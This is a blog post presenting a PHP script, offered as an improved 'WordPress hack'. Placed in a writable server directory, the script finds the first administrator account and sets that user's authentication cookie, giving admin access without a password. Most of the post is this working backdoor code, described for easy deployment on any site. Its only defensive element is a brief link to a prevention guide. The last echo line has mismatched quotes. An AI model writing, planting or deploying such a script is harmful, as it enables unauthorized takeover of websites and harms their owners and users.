WordPress Hacking – Revised to be more Automatic
A while back we wrote an article on a WordPress hack showing how simple it is to write a script, which when placed on the server will allow for bypassing the WordPress admin credentials. While this hack will work in most cases (as most people use the admin id 1 or expose their admin id as the “author”), that version will only work if you have access to see the admin id.
The following hack, is a bit more sophisticated, however it will search WordPress using WordPress functions to find the first user with the “administrator” role, and use that ID to set the cookie. It will also detect if the script is run using SSL, and flag the cookie accordingly. Once the hack is complete, it will display a link using the URL they have set for their blog as the base – which makes this hack more versatile as it can be placed anywhere on the site that is writable (for example: “wp-content/uploads”) and can execute scripts (see our guide on how to prevent this type of hack).
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 | <?php include('wp-config.php'); // get all administrator users in the database $admins = new WP_User_Query( array( 'role' => 'administrator', 'orderby' => 'display_name') ); $username = ''; // if admin user is found, execute login hack if(!empty($admins->results)) { foreach($admins->results as $admin) { $username = $admin->user_login; // set the admin cookie (fake the login without the password) wp_set_auth_cookie( // use the first admin user id found $admin->ID, // remember the session 1, // use SSL if the site is set to use SSL (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] != 'off') ? 1 : 0 ); // exit after first object break; } } // check if username was found if(empty($username)) { echo "No administrators found"; exit(); } // display link to login echo "<a href="" . WP_HOME . "/wp-admin/">Click here to login</a> as <b>{$username}<b>"; |